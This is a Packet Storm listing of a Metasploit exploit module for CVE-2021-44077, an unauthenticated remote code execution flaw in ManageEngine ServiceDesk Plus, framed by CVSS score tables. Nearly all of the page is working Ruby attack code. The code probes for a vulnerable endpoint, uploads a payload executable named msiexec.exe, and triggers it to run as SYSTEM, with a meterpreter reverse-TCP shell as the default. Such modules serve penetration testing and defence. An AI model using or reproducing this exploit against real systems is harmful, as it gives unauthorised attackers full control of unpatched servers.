Lucene search

K
packetstormWvu, Y4er, metasploit.comPACKETSTORM:165400
HistoryDec 28, 2021 - 12:00 a.m.

ManageEngine ServiceDesk Plus Remote Code Execution

2021-12-2800:00:00
wvu, Y4er, metasploit.com
packetstormsecurity.com
457

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

7.5 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Exploit::Remote  
  
Rank = ExcellentRanking  
  
prepend Msf::Exploit::Remote::AutoCheck  
include Msf::Exploit::Remote::HttpClient  
include Msf::Exploit::EXE  
  
def initialize(info = {})  
super(  
update_info(  
info,  
'Name' => 'ManageEngine ServiceDesk Plus CVE-2021-44077',  
'Description' => %q{  
This module exploits CVE-2021-44077, an unauthenticated remote code  
execution vulnerability in ManageEngine ServiceDesk Plus, to upload an  
EXE (msiexec.exe) and execute it as the SYSTEM account.  
  
Note that build 11305 is vulnerable to the authentication bypass but  
not the file upload. The module will check for an exploitable build.  
},  
'Author' => [  
# Discovered by unknown threat actors  
'wvu', # Analysis and exploit  
'Y4er' # Additional confirmation  
],  
'References' => [  
['CVE', '2021-44077'],  
['URL', 'https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-authentication-bypass-vulnerability-in-servicedesk-plus-versions-11138-and-above'],  
['URL', 'https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-for-cve-2021-44077-unauthenticated-rce-vulnerability-in-servicedesk-plus-versions-up-to-11305-22-11-2021'],  
['URL', 'https://www.cisa.gov/uscert/ncas/alerts/aa21-336a'],  
['URL', 'https://unit42.paloaltonetworks.com/tiltedtemple-manageengine-servicedesk-plus/'],  
['URL', 'https://attackerkb.com/topics/qv2aD8YfMN/cve-2021-44077/rapid7-analysis'],  
['URL', 'https://xz.aliyun.com/t/10631'] # Y4er's writeup  
],  
'DisclosureDate' => '2021-09-16',  
'License' => MSF_LICENSE,  
'Platform' => 'win',  
'Arch' => [ARCH_X86, ARCH_X64],  
'Privileged' => true,  
'Targets' => [  
['Windows Dropper', {}]  
],  
'DefaultTarget' => 0,  
'DefaultOptions' => {  
'RPORT' => 8080,  
'PAYLOAD' => 'windows/x64/meterpreter_reverse_tcp'  
},  
'Notes' => {  
'Stability' => [CRASH_SAFE],  
'Reliability' => [REPEATABLE_SESSION],  
'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]  
}  
)  
)  
  
register_options([  
OptString.new('TARGETURI', [true, 'Base path', '/'])  
])  
end  
  
def check  
res = send_request_cgi(  
'method' => 'GET',  
'uri' => normalize_uri(target_uri.path, '/RestAPI/ImportTechnicians')  
)  
  
unless res  
return CheckCode::Unknown('Target failed to respond to check.')  
end  
  
# NOTE: /RestAPI/ImportTechnicians was removed after build 11303  
unless res.code == 200 && res.get_html_document.at('//form[@name="ImportTechnicians"]')  
return CheckCode::Safe('/RestAPI/ImportTechnicians is not present.')  
end  
  
CheckCode::Appears('/RestAPI/ImportTechnicians is present.')  
end  
  
def exploit  
upload_msiexec  
execute_msiexec  
end  
  
def upload_msiexec  
print_status('Uploading msiexec.exe')  
  
form = Rex::MIME::Message.new  
form.add_part(Faker::Hacker.verb, nil, nil, 'form-data; name="step"')  
form.add_part(generate_payload_exe, 'application/octet-stream', 'binary',  
'form-data; name="theFile"; filename="msiexec.exe"')  
  
res = send_request_cgi(  
'method' => 'POST',  
'uri' => normalize_uri(target_uri.path, '/RestAPI/ImportTechnicians'),  
'ctype' => "multipart/form-data; boundary=#{form.bound}",  
'data' => form.to_s  
)  
  
unless res&.code == 401 && res.body.include?('sdp.vulnerability.exceptionerror.title')  
fail_with(Failure::NotVulnerable, 'Failed to upload msiexec.exe')  
end  
  
print_good('Successfully uploaded msiexec.exe')  
end  
  
def execute_msiexec  
print_status('Executing msiexec.exe')  
  
# This endpoint "won't" return  
send_request_cgi({  
'method' => 'POST',  
'uri' => normalize_uri(target_uri.path, '/RestAPI/s247action'),  
'vars_post' => {  
'execute' => 's247AgentInstallationProcess'  
}  
}, 0)  
end  
  
# XXX: FileDropper dies a miserable death if the file is in use  
def on_new_session(_session)  
super  
  
# Working directory is C:\Program Files\ManageEngine\ServiceDesk\site24x7  
print_warning("Yo, don't forget to clean up ..\\bin\\msiexec.exe")  
end  
  
end  
`

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

7.5 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P